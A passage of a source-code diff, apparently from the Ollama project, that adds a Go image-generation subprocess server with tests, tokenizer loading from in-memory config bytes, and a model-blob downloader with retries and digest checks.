// If dtype is 0, tensors are loaded in their original dtype.
|
||||
// Automatically uses streaming (memory-efficient) when dtype conversion is needed,
|
||||
|
||||
353
x/imagegen/server.go
Normal file
353
x/imagegen/server.go
Normal file
@@ -0,0 +1,353 @@
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
"bytes"
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"log/slog"
|
||||
"math/rand"
|
||||
"net"
|
||||
"net/http"
|
||||
"os"
|
||||
"os/exec"
|
||||
"path/filepath"
|
||||
"strconv"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/ollama/ollama/llm"
|
||||
"github.com/ollama/ollama/ml"
|
||||
)
|
||||
|
||||
// Server wraps an image generation subprocess to implement llm.LlamaServer.
|
||||
type Server struct {
|
||||
mu sync.Mutex
|
||||
cmd *exec.Cmd
|
||||
port int
|
||||
modelName string
|
||||
vramSize uint64
|
||||
done chan error
|
||||
client *http.Client
|
||||
lastErr string // Last stderr line for error reporting
|
||||
lastErrLock sync.Mutex
|
||||
}
|
||||
|
||||
// completionRequest is sent to the subprocess
|
||||
type completionRequest struct {
|
||||
Prompt string `json:"prompt"`
|
||||
Width int32 `json:"width,omitempty"`
|
||||
Height int32 `json:"height,omitempty"`
|
||||
Steps int `json:"steps,omitempty"`
|
||||
Seed int64 `json:"seed,omitempty"`
|
||||
}
|
||||
|
||||
// completionResponse is received from the subprocess
|
||||
type completionResponse struct {
|
||||
Content string `json:"content"`
|
||||
Done bool `json:"done"`
|
||||
}
|
||||
|
||||
// NewServer spawns a new image generation subprocess and waits until it's ready.
|
||||
func NewServer(modelName string) (*Server, error) {
|
||||
// Validate platform support before attempting to start
|
||||
if err := CheckPlatformSupport(); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// Find a free port
|
||||
port := 0
|
||||
if a, err := net.ResolveTCPAddr("tcp", "localhost:0"); err == nil {
|
||||
if l, err := net.ListenTCP("tcp", a); err == nil {
|
||||
port = l.Addr().(*net.TCPAddr).Port
|
||||
l.Close()
|
||||
}
|
||||
}
|
||||
if port == 0 {
|
||||
port = rand.Intn(65535-49152) + 49152
|
||||
}
|
||||
|
||||
// Get the ollama executable path
|
||||
exe, err := os.Executable()
|
||||
if err != nil {
|
||||
return nil, fmt.Errorf("unable to lookup executable path: %w", err)
|
||||
}
|
||||
if eval, err := filepath.EvalSymlinks(exe); err == nil {
|
||||
exe = eval
|
||||
}
|
||||
|
||||
// Spawn subprocess: ollama runner --image-engine --model <path> --port <port>
|
||||
cmd := exec.Command(exe, "runner", "--image-engine", "--model", modelName, "--port", strconv.Itoa(port))
|
||||
cmd.Env = os.Environ()
|
||||
|
||||
s := &Server{
|
||||
cmd: cmd,
|
||||
port: port,
|
||||
modelName: modelName,
|
||||
vramSize: EstimateVRAM(modelName),
|
||||
done: make(chan error, 1),
|
||||
client: &http.Client{Timeout: 10 * time.Minute},
|
||||
}
|
||||
|
||||
// Forward subprocess stdout/stderr to server logs
|
||||
stdout, _ := cmd.StdoutPipe()
|
||||
stderr, _ := cmd.StderrPipe()
|
||||
go func() {
|
||||
scanner := bufio.NewScanner(stdout)
|
||||
for scanner.Scan() {
|
||||
slog.Info("image-runner", "msg", scanner.Text())
|
||||
}
|
||||
}()
|
||||
go func() {
|
||||
scanner := bufio.NewScanner(stderr)
|
||||
for scanner.Scan() {
|
||||
line := scanner.Text()
|
||||
slog.Warn("image-runner", "msg", line)
|
||||
// Capture last error line for better error reporting
|
||||
s.lastErrLock.Lock()
|
||||
s.lastErr = line
|
||||
s.lastErrLock.Unlock()
|
||||
}
|
||||
}()
|
||||
|
||||
slog.Info("starting image runner subprocess", "model", modelName, "port", port)
|
||||
if err := cmd.Start(); err != nil {
|
||||
return nil, fmt.Errorf("failed to start image runner: %w", err)
|
||||
}
|
||||
|
||||
// Reap subprocess when it exits
|
||||
go func() {
|
||||
err := cmd.Wait()
|
||||
s.done <- err
|
||||
}()
|
||||
|
||||
// Wait for subprocess to be ready
|
||||
if err := s.waitUntilRunning(); err != nil {
|
||||
s.Close()
|
||||
return nil, err
|
||||
}
|
||||
|
||||
return s, nil
|
||||
}
|
||||
|
||||
// ModelPath returns the path to the model.
|
||||
func (s *Server) ModelPath() string {
|
||||
return s.modelName
|
||||
}
|
||||
|
||||
// Load is called by the scheduler after the server is created.
|
||||
func (s *Server) Load(ctx context.Context, systemInfo ml.SystemInfo, gpus []ml.DeviceInfo, requireFull bool) ([]ml.DeviceID, error) {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
// Ping checks if the subprocess is healthy.
|
||||
func (s *Server) Ping(ctx context.Context) error {
|
||||
url := fmt.Sprintf("http://127.0.0.1:%d/health", s.port)
|
||||
req, err := http.NewRequestWithContext(ctx, "GET", url, nil)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
resp, err := s.client.Do(req)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return fmt.Errorf("health check failed: %d", resp.StatusCode)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// waitUntilRunning waits for the subprocess to be ready.
|
||||
func (s *Server) waitUntilRunning() error {
|
||||
ctx := context.Background()
|
||||
timeout := time.After(2 * time.Minute)
|
||||
ticker := time.NewTicker(100 * time.Millisecond)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case err := <-s.done:
|
||||
// Include last stderr line for better error context
|
||||
s.lastErrLock.Lock()
|
||||
lastErr := s.lastErr
|
||||
s.lastErrLock.Unlock()
|
||||
if lastErr != "" {
|
||||
return fmt.Errorf("image runner failed: %s (exit: %v)", lastErr, err)
|
||||
}
|
||||
return fmt.Errorf("image runner exited unexpectedly: %w", err)
|
||||
case <-timeout:
|
||||
s.lastErrLock.Lock()
|
||||
lastErr := s.lastErr
|
||||
s.lastErrLock.Unlock()
|
||||
if lastErr != "" {
|
||||
return fmt.Errorf("timeout waiting for image runner: %s", lastErr)
|
||||
}
|
||||
return errors.New("timeout waiting for image runner to start")
|
||||
case <-ticker.C:
|
||||
if err := s.Ping(ctx); err == nil {
|
||||
slog.Info("image runner is ready", "port", s.port)
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// WaitUntilRunning implements the LlamaServer interface (no-op since NewServer waits).
|
||||
func (s *Server) WaitUntilRunning(ctx context.Context) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Completion generates an image from the prompt via the subprocess.
|
||||
func (s *Server) Completion(ctx context.Context, req llm.CompletionRequest, fn func(llm.CompletionResponse)) error {
|
||||
// Build request
|
||||
creq := completionRequest{
|
||||
Prompt: req.Prompt,
|
||||
Width: 1024,
|
||||
Height: 1024,
|
||||
Steps: 9,
|
||||
Seed: time.Now().UnixNano(),
|
||||
}
|
||||
|
||||
if req.Options != nil {
|
||||
if req.Options.NumCtx > 0 && req.Options.NumCtx <= 4096 {
|
||||
creq.Width = int32(req.Options.NumCtx)
|
||||
}
|
||||
if req.Options.NumGPU > 0 && req.Options.NumGPU <= 4096 {
|
||||
creq.Height = int32(req.Options.NumGPU)
|
||||
}
|
||||
if req.Options.NumPredict > 0 && req.Options.NumPredict <= 100 {
|
||||
creq.Steps = req.Options.NumPredict
|
||||
}
|
||||
if req.Options.Seed > 0 {
|
||||
creq.Seed = int64(req.Options.Seed)
|
||||
}
|
||||
}
|
||||
|
||||
// Encode request body
|
||||
body, err := json.Marshal(creq)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Send request to subprocess
|
||||
url := fmt.Sprintf("http://127.0.0.1:%d/completion", s.port)
|
||||
httpReq, err := http.NewRequestWithContext(ctx, "POST", url, bytes.NewReader(body))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
httpReq.Header.Set("Content-Type", "application/json")
|
||||
|
||||
resp, err := s.client.Do(httpReq)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return fmt.Errorf("completion request failed: %d", resp.StatusCode)
|
||||
}
|
||||
|
||||
// Stream responses
|
||||
scanner := bufio.NewScanner(resp.Body)
|
||||
for scanner.Scan() {
|
||||
var cresp completionResponse
|
||||
if err := json.Unmarshal(scanner.Bytes(), &cresp); err != nil {
|
||||
continue
|
||||
}
|
||||
fn(llm.CompletionResponse{
|
||||
Content: cresp.Content,
|
||||
Done: cresp.Done,
|
||||
})
|
||||
if cresp.Done {
|
||||
break
|
||||
}
|
||||
}
|
||||
|
||||
return scanner.Err()
|
||||
}
|
||||
|
||||
// Close terminates the subprocess.
|
||||
func (s *Server) Close() error {
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
|
||||
if s.cmd != nil && s.cmd.Process != nil {
|
||||
slog.Info("stopping image runner subprocess", "pid", s.cmd.Process.Pid)
|
||||
s.cmd.Process.Signal(os.Interrupt)
|
||||
|
||||
// Wait briefly for graceful shutdown
|
||||
select {
|
||||
case <-s.done:
|
||||
case <-time.After(5 * time.Second):
|
||||
s.cmd.Process.Kill()
|
||||
}
|
||||
s.cmd = nil
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// VRAMSize returns the estimated VRAM usage.
|
||||
func (s *Server) VRAMSize() uint64 {
|
||||
return s.vramSize
|
||||
}
|
||||
|
||||
// TotalSize returns the total memory usage.
|
||||
func (s *Server) TotalSize() uint64 {
|
||||
return s.vramSize
|
||||
}
|
||||
|
||||
// VRAMByGPU returns VRAM usage for a specific GPU.
|
||||
func (s *Server) VRAMByGPU(id ml.DeviceID) uint64 {
|
||||
return s.vramSize
|
||||
}
|
||||
|
||||
// Embedding is not supported for image generation models.
|
||||
func (s *Server) Embedding(ctx context.Context, input string) ([]float32, int, error) {
|
||||
return nil, 0, errors.New("embedding not supported for image generation models")
|
||||
}
|
||||
|
||||
// Tokenize is not supported for image generation models.
|
||||
func (s *Server) Tokenize(ctx context.Context, content string) ([]int, error) {
|
||||
return nil, errors.New("tokenize not supported for image generation models")
|
||||
}
|
||||
|
||||
// Detokenize is not supported for image generation models.
|
||||
func (s *Server) Detokenize(ctx context.Context, tokens []int) (string, error) {
|
||||
return "", errors.New("detokenize not supported for image generation models")
|
||||
}
|
||||
|
||||
// Pid returns the subprocess PID.
|
||||
func (s *Server) Pid() int {
|
||||
s.mu.Lock()
|
||||
defer s.mu.Unlock()
|
||||
if s.cmd != nil && s.cmd.Process != nil {
|
||||
return s.cmd.Process.Pid
|
||||
}
|
||||
return -1
|
||||
}
|
||||
|
||||
// GetPort returns the subprocess port.
|
||||
func (s *Server) GetPort() int {
|
||||
return s.port
|
||||
}
|
||||
|
||||
// GetDeviceInfos returns nil since we don't track GPU info.
|
||||
func (s *Server) GetDeviceInfos(ctx context.Context) []ml.DeviceInfo {
|
||||
return nil
|
||||
}
|
||||
|
||||
// HasExited returns true if the subprocess has exited.
|
||||
func (s *Server) HasExited() bool {
|
||||
select {
|
||||
case <-s.done:
|
||||
return true
|
||||
default:
|
||||
return false
|
||||
}
|
||||
}
|
||||
|
||||
// Ensure Server implements llm.LlamaServer
|
||||
var _ llm.LlamaServer = (*Server)(nil)
|
||||
82
x/imagegen/server_test.go
Normal file
82
x/imagegen/server_test.go
Normal file
@@ -0,0 +1,82 @@
|
||||
package imagegen
|
||||
|
||||
import (
|
||||
"runtime"
|
||||
"testing"
|
||||
)
|
||||
|
||||
// TestPlatformSupport verifies platform validation works correctly.
|
||||
func TestPlatformSupport(t *testing.T) {
|
||||
err := CheckPlatformSupport()
|
||||
|
||||
switch runtime.GOOS {
|
||||
case "darwin":
|
||||
if runtime.GOARCH == "arm64" {
|
||||
// Apple Silicon should be supported
|
||||
if err != nil {
|
||||
t.Errorf("Expected nil error on darwin/arm64, got: %v", err)
|
||||
}
|
||||
} else {
|
||||
// Intel Mac should fail
|
||||
if err == nil {
|
||||
t.Error("Expected error on darwin/amd64 (Intel), got nil")
|
||||
}
|
||||
if err != nil && err.Error() == "" {
|
||||
t.Error("Expected meaningful error message for unsupported platform")
|
||||
}
|
||||
}
|
||||
case "linux", "windows":
|
||||
// Linux/Windows are allowed (CUDA support checked at runtime)
|
||||
if err != nil {
|
||||
t.Errorf("Expected nil error on %s, got: %v", runtime.GOOS, err)
|
||||
}
|
||||
default:
|
||||
// Other platforms should fail
|
||||
if err == nil {
|
||||
t.Errorf("Expected error on unsupported platform %s, got nil", runtime.GOOS)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestMemoryRequirementsError verifies memory check returns clear error.
|
||||
func TestMemoryRequirementsError(t *testing.T) {
|
||||
// Test with insufficient memory
|
||||
err := CheckMemoryRequirements("test-model", 8*GB)
|
||||
if err == nil {
|
||||
t.Error("Expected error for insufficient memory (8GB < 21GB default)")
|
||||
}
|
||||
|
||||
// Test with sufficient memory
|
||||
err = CheckMemoryRequirements("test-model", 32*GB)
|
||||
if err != nil {
|
||||
t.Errorf("Expected no error for sufficient memory (32GB), got: %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
// TestEstimateVRAMReturnsReasonableDefaults verifies VRAM estimates are sensible.
|
||||
func TestEstimateVRAMReturnsReasonableDefaults(t *testing.T) {
|
||||
// Unknown model should return default (21GB)
|
||||
vram := EstimateVRAM("unknown-model")
|
||||
if vram < 10*GB || vram > 100*GB {
|
||||
t.Errorf("VRAM estimate %d GB is outside reasonable range (10-100 GB)", vram/GB)
|
||||
}
|
||||
|
||||
// Verify known pipeline estimates exist and are reasonable
|
||||
for name, estimate := range modelVRAMEstimates {
|
||||
if estimate < 10*GB {
|
||||
t.Errorf("VRAM estimate for %s (%d GB) is suspiciously low", name, estimate/GB)
|
||||
}
|
||||
if estimate > 200*GB {
|
||||
t.Errorf("VRAM estimate for %s (%d GB) is suspiciously high", name, estimate/GB)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// TestServerInterfaceCompliance verifies Server implements llm.LlamaServer.
|
||||
// This is a compile-time check but we document it as a test.
|
||||
func TestServerInterfaceCompliance(t *testing.T) {
|
||||
// The var _ llm.LlamaServer = (*Server)(nil) line in server.go
|
||||
// ensures compile-time interface compliance.
|
||||
// This test documents that requirement.
|
||||
t.Log("Server implements llm.LlamaServer interface (compile-time checked)")
|
||||
}
|
||||
@@ -256,6 +256,164 @@ func rewritePatternForRE2(pattern string) string {
|
||||
return pattern
|
||||
}
|
||||
|
||||
// LoadFromBytes loads a tokenizer from tokenizer.json bytes.
|
||||
// This is useful when loading from blob storage where the file content is already in memory.
|
||||
// Note: This won't load special token config from companion files. Use LoadFromBytesWithConfig
|
||||
// to provide tokenizer_config.json data for proper PAD/EOS token loading.
|
||||
func LoadFromBytes(data []byte) (*Tokenizer, error) {
|
||||
return loadFromTokenizerJSON(data, "")
|
||||
}
|
||||
|
||||
// TokenizerConfig holds optional configuration data that can be passed to LoadFromBytesWithConfig.
|
||||
type TokenizerConfig struct {
|
||||
TokenizerConfigJSON []byte // tokenizer_config.json content
|
||||
GenerationConfigJSON []byte // generation_config.json content
|
||||
SpecialTokensMapJSON []byte // special_tokens_map.json content
|
||||
ConfigJSON []byte // config.json content
|
||||
}
|
||||
|
||||
// LoadFromBytesWithConfig loads a tokenizer from tokenizer.json bytes with additional config files.
|
||||
// This is useful when loading from blob storage where companion config files are also blobs.
|
||||
func LoadFromBytesWithConfig(data []byte, config *TokenizerConfig) (*Tokenizer, error) {
|
||||
t, err := loadFromTokenizerJSON(data, "")
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
if config == nil {
|
||||
return t, nil
|
||||
}
|
||||
|
||||
// Apply special token configs from provided data
|
||||
loadSpecialTokenConfigFromBytes(t, config)
|
||||
|
||||
return t, nil
|
||||
}
|
||||
|
||||
// loadSpecialTokenConfigFromBytes loads special token configuration from byte slices.
|
||||
func loadSpecialTokenConfigFromBytes(t *Tokenizer, config *TokenizerConfig) {
|
||||
// Helper to parse eos_token_id which can be int or []int
|
||||
parseTokenIDs := func(v interface{}) []int32 {
|
||||
switch val := v.(type) {
|
||||
case float64:
|
||||
return []int32{int32(val)}
|
||||
case []interface{}:
|
||||
ids := make([]int32, 0, len(val))
|
||||
for _, id := range val {
|
||||
if f, ok := id.(float64); ok {
|
||||
ids = append(ids, int32(f))
|
||||
}
|
||||
}
|
||||
return ids
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Priority 1: generation_config.json
|
||||
if len(config.GenerationConfigJSON) > 0 {
|
||||
var genConfig struct {
|
||||
EOSTokenID interface{} `json:"eos_token_id"`
|
||||
BOSTokenID interface{} `json:"bos_token_id"`
|
||||
}
|
||||
if err := json.Unmarshal(config.GenerationConfigJSON, &genConfig); err == nil {
|
||||
if ids := parseTokenIDs(genConfig.EOSTokenID); len(ids) > 0 {
|
||||
t.vocab.EOS = ids
|
||||
}
|
||||
if ids := parseTokenIDs(genConfig.BOSTokenID); len(ids) > 0 {
|
||||
t.vocab.BOS = ids[0]
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Priority 2: config.json
|
||||
if len(config.ConfigJSON) > 0 && (len(t.vocab.EOS) == 0 || t.vocab.BOS < 0) {
|
||||
var modelConfig struct {
|
||||
EOSTokenID interface{} `json:"eos_token_id"`
|
||||
BOSTokenID interface{} `json:"bos_token_id"`
|
||||
}
|
||||
if err := json.Unmarshal(config.ConfigJSON, &modelConfig); err == nil {
|
||||
if len(t.vocab.EOS) == 0 {
|
||||
if ids := parseTokenIDs(modelConfig.EOSTokenID); len(ids) > 0 {
|
||||
t.vocab.EOS = ids
|
||||
}
|
||||
}
|
||||
if t.vocab.BOS < 0 {
|
||||
if ids := parseTokenIDs(modelConfig.BOSTokenID); len(ids) > 0 {
|
||||
t.vocab.BOS = ids[0]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Priority 3: tokenizer_config.json
|
||||
if len(config.TokenizerConfigJSON) > 0 {
|
||||
var tokConfig struct {
|
||||
BOSToken interface{} `json:"bos_token"`
|
||||
EOSToken interface{} `json:"eos_token"`
|
||||
PADToken interface{} `json:"pad_token"`
|
||||
AddBOSToken *bool `json:"add_bos_token"`
|
||||
AddEOSToken *bool `json:"add_eos_token"`
|
||||
}
|
||||
if err := json.Unmarshal(config.TokenizerConfigJSON, &tokConfig); err == nil {
|
||||
if t.vocab.BOS < 0 {
|
||||
if bosStr := extractTokenString(tokConfig.BOSToken); bosStr != "" {
|
||||
if id, ok := t.specialTokens[bosStr]; ok {
|
||||
t.vocab.BOS = id
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(t.vocab.EOS) == 0 {
|
||||
if eosStr := extractTokenString(tokConfig.EOSToken); eosStr != "" {
|
||||
if id, ok := t.specialTokens[eosStr]; ok {
|
||||
t.vocab.EOS = []int32{id}
|
||||
}
|
||||
}
|
||||
}
|
||||
if t.vocab.PAD < 0 {
|
||||
if padStr := extractTokenString(tokConfig.PADToken); padStr != "" {
|
||||
if id, ok := t.specialTokens[padStr]; ok {
|
||||
t.vocab.PAD = id
|
||||
}
|
||||
}
|
||||
}
|
||||
if tokConfig.AddBOSToken != nil {
|
||||
t.vocab.AddBOS = *tokConfig.AddBOSToken
|
||||
}
|
||||
if tokConfig.AddEOSToken != nil {
|
||||
t.vocab.AddEOS = *tokConfig.AddEOSToken
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Priority 4: special_tokens_map.json
|
||||
if len(config.SpecialTokensMapJSON) > 0 {
|
||||
var tokensMap map[string]interface{}
|
||||
if err := json.Unmarshal(config.SpecialTokensMapJSON, &tokensMap); err == nil {
|
||||
if t.vocab.BOS < 0 {
|
||||
if bosStr := extractTokenString(tokensMap["bos_token"]); bosStr != "" {
|
||||
if id, ok := t.specialTokens[bosStr]; ok {
|
||||
t.vocab.BOS = id
|
||||
}
|
||||
}
|
||||
}
|
||||
if len(t.vocab.EOS) == 0 {
|
||||
if eosStr := extractTokenString(tokensMap["eos_token"]); eosStr != "" {
|
||||
if id, ok := t.specialTokens[eosStr]; ok {
|
||||
t.vocab.EOS = []int32{id}
|
||||
}
|
||||
}
|
||||
}
|
||||
if t.vocab.PAD < 0 {
|
||||
if padStr := extractTokenString(tokensMap["pad_token"]); padStr != "" {
|
||||
if id, ok := t.specialTokens[padStr]; ok {
|
||||
t.vocab.PAD = id
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Load loads a tokenizer from a path which can be:
|
||||
// - A tokenizer.json file
|
||||
// - A directory containing tokenizer.json or vocab.json + merges.txt
|
||||
@@ -924,6 +1082,12 @@ func (t *Tokenizer) GetSpecialToken(name string) (int32, bool) {
|
||||
return id, ok
|
||||
}
|
||||
|
||||
// Vocab returns the vocabulary as a slice of token strings indexed by token ID.
|
||||
// This is useful for constrained decoding where we need to map tokens to grammar symbols.
|
||||
func (t *Tokenizer) Vocab() []string {
|
||||
return t.vocab.Values
|
||||
}
|
||||
|
||||
// LoadVocabMerges loads a tokenizer from vocab.json + merges.txt format (GPT-style)
|
||||
func LoadVocabMerges(dir string) (*Tokenizer, error) {
|
||||
vocabPath := dir + "/vocab.json"
|
||||
|
||||
320
x/imagegen/transfer/download.go
Normal file
320
x/imagegen/transfer/download.go
Normal file
@@ -0,0 +1,320 @@
|
||||
package transfer
|
||||
|
||||
import (
|
||||
"cmp"
|
||||
"context"
|
||||
"crypto/sha256"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"log/slog"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"slices"
|
||||
"sync"
|
||||
"sync/atomic"
|
||||
"time"
|
||||
|
||||
"golang.org/x/sync/errgroup"
|
||||
"golang.org/x/sync/semaphore"
|
||||
)
|
||||
|
||||
var (
|
||||
errStalled = errors.New("download stalled")
|
||||
errSlow = errors.New("download too slow")
|
||||
)
|
||||
|
||||
type downloader struct {
|
||||
client *http.Client
|
||||
baseURL string
|
||||
destDir string
|
||||
repository string // Repository path for blob URLs (e.g., "library/model")
|
||||
token *string
|
||||
getToken func(context.Context, AuthChallenge) (string, error)
|
||||
userAgent string
|
||||
stallTimeout time.Duration
|
||||
progress *progressTracker
|
||||
speeds *speedTracker
|
||||
logger *slog.Logger
|
||||
}
|
||||
|
||||
func download(ctx context.Context, opts DownloadOptions) error {
|
||||
if len(opts.Blobs) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Filter existing
|
||||
var blobs []Blob
|
||||
var total int64
|
||||
for _, b := range opts.Blobs {
|
||||
if fi, _ := os.Stat(filepath.Join(opts.DestDir, digestToPath(b.Digest))); fi != nil && fi.Size() == b.Size {
|
||||
if opts.Logger != nil {
|
||||
opts.Logger.Debug("blob already exists", "digest", b.Digest, "size", b.Size)
|
||||
}
|
||||
continue
|
||||
}
|
||||
blobs = append(blobs, b)
|
||||
total += b.Size
|
||||
}
|
||||
if len(blobs) == 0 {
|
||||
return nil
|
||||
}
|
||||
|
||||
token := opts.Token
|
||||
d := &downloader{
|
||||
client: cmp.Or(opts.Client, defaultClient),
|
||||
baseURL: opts.BaseURL,
|
||||
destDir: opts.DestDir,
|
||||
repository: cmp.Or(opts.Repository, "library/_"),
|
||||
token: &token,
|
||||
getToken: opts.GetToken,
|
||||
userAgent: cmp.Or(opts.UserAgent, defaultUserAgent),
|
||||
stallTimeout: cmp.Or(opts.StallTimeout, defaultStallTimeout),
|
||||
progress: newProgressTracker(total, opts.Progress),
|
||||
speeds: &speedTracker{},
|
||||
logger: opts.Logger,
|
||||
}
|
||||
|
||||
concurrency := cmp.Or(opts.Concurrency, DefaultDownloadConcurrency)
|
||||
sem := semaphore.NewWeighted(int64(concurrency))
|
||||
|
||||
g, ctx := errgroup.WithContext(ctx)
|
||||
for _, blob := range blobs {
|
||||
g.Go(func() error {
|
||||
if err := sem.Acquire(ctx, 1); err != nil {
|
||||
return err
|
||||
}
|
||||
defer sem.Release(1)
|
||||
return d.download(ctx, blob)
|
||||
})
|
||||
}
|
||||
return g.Wait()
|
||||
}
|
||||
|
||||
func (d *downloader) download(ctx context.Context, blob Blob) error {
|
||||
var lastErr error
|
||||
var slowRetries int
|
||||
attempt := 0
|
||||
|
||||
for attempt < maxRetries {
|
||||
if attempt > 0 {
|
||||
if err := backoff(ctx, attempt, time.Second<<uint(attempt-1)); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
start := time.Now()
|
||||
n, err := d.downloadOnce(ctx, blob)
|
||||
if err == nil {
|
||||
if s := time.Since(start).Seconds(); s > 0 {
|
||||
d.speeds.record(float64(blob.Size) / s)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
d.progress.add(-n) // rollback
|
||||
|
||||
switch {
|
||||
case errors.Is(err, context.Canceled), errors.Is(err, context.DeadlineExceeded):
|
||||
return err
|
||||
case errors.Is(err, errStalled):
|
||||
// Don't count stall retries against limit
|
||||
case errors.Is(err, errSlow):
|
||||
if slowRetries++; slowRetries >= 3 {
|
||||
attempt++ // Only count after 3 slow retries
|
||||
}
|
||||
default:
|
||||
attempt++
|
||||
}
|
||||
lastErr = err
|
||||
}
|
||||
return fmt.Errorf("%w: %v", errMaxRetriesExceeded, lastErr)
|
||||
}
|
||||
|
||||
func (d *downloader) downloadOnce(ctx context.Context, blob Blob) (int64, error) {
|
||||
if d.logger != nil {
|
||||
d.logger.Debug("downloading blob", "digest", blob.Digest, "size", blob.Size)
|
||||
}
|
||||
|
||||
baseURL, _ := url.Parse(d.baseURL)
|
||||
u, err := d.resolve(ctx, fmt.Sprintf("%s/v2/%s/blobs/%s", d.baseURL, d.repository, blob.Digest))
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodGet, u.String(), nil)
|
||||
req.Header.Set("User-Agent", d.userAgent)
|
||||
// Add auth only for same-host (not CDN)
|
||||
if u.Host == baseURL.Host && *d.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*d.token)
|
||||
}
|
||||
|
||||
resp, err := d.client.Do(req)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
if resp.StatusCode != http.StatusOK {
|
||||
return 0, fmt.Errorf("status %d", resp.StatusCode)
|
||||
}
|
||||
|
||||
return d.save(ctx, blob, resp.Body)
|
||||
}
|
||||
|
||||
func (d *downloader) save(ctx context.Context, blob Blob, r io.Reader) (int64, error) {
|
||||
dest := filepath.Join(d.destDir, digestToPath(blob.Digest))
|
||||
tmp := dest + ".tmp"
|
||||
os.MkdirAll(filepath.Dir(dest), 0o755)
|
||||
|
||||
f, err := os.Create(tmp)
|
||||
if err != nil {
|
||||
return 0, err
|
||||
}
|
||||
defer f.Close()
|
||||
setSparse(f)
|
||||
|
||||
h := sha256.New()
|
||||
n, err := d.copy(ctx, f, r, h)
|
||||
if err != nil {
|
||||
os.Remove(tmp)
|
||||
return n, err
|
||||
}
|
||||
f.Close()
|
||||
|
||||
if got := fmt.Sprintf("sha256:%x", h.Sum(nil)); got != blob.Digest {
|
||||
os.Remove(tmp)
|
||||
return n, fmt.Errorf("digest mismatch")
|
||||
}
|
||||
if n != blob.Size {
|
||||
os.Remove(tmp)
|
||||
return n, fmt.Errorf("size mismatch")
|
||||
}
|
||||
return n, os.Rename(tmp, dest)
|
||||
}
|
||||
|
||||
func (d *downloader) copy(ctx context.Context, dst io.Writer, src io.Reader, h io.Writer) (int64, error) {
|
||||
var n int64
|
||||
var lastRead atomic.Int64
|
||||
lastRead.Store(time.Now().UnixNano())
|
||||
start := time.Now()
|
||||
|
||||
ctx, cancel := context.WithCancelCause(ctx)
|
||||
defer cancel(nil)
|
||||
|
||||
go func() {
|
||||
tick := time.NewTicker(time.Second)
|
||||
defer tick.Stop()
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return
|
||||
case <-tick.C:
|
||||
if time.Since(time.Unix(0, lastRead.Load())) > d.stallTimeout {
|
||||
cancel(errStalled)
|
||||
return
|
||||
}
|
||||
if e := time.Since(start); e > 5*time.Second {
|
||||
if m := d.speeds.median(); m > 0 && float64(n)/e.Seconds() < m*0.1 {
|
||||
cancel(errSlow)
|
||||
return
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
buf := make([]byte, 32*1024)
|
||||
for {
|
||||
if err := ctx.Err(); err != nil {
|
||||
if c := context.Cause(ctx); c != nil {
|
||||
return n, c
|
||||
}
|
||||
return n, err
|
||||
}
|
||||
|
||||
nr, err := src.Read(buf)
|
||||
if nr > 0 {
|
||||
lastRead.Store(time.Now().UnixNano())
|
||||
dst.Write(buf[:nr])
|
||||
h.Write(buf[:nr])
|
||||
d.progress.add(int64(nr))
|
||||
n += int64(nr)
|
||||
}
|
||||
if err == io.EOF {
|
||||
return n, nil
|
||||
}
|
||||
if err != nil {
|
||||
return n, err
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (d *downloader) resolve(ctx context.Context, rawURL string) (*url.URL, error) {
|
||||
u, _ := url.Parse(rawURL)
|
||||
for range 10 {
|
||||
req, _ := http.NewRequestWithContext(ctx, http.MethodGet, u.String(), nil)
|
||||
req.Header.Set("User-Agent", d.userAgent)
|
||||
if *d.token != "" {
|
||||
req.Header.Set("Authorization", "Bearer "+*d.token)
|
||||
}
|
||||
|
||||
resp, err := d.client.Do(req)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
resp.Body.Close()
|
||||
|
||||
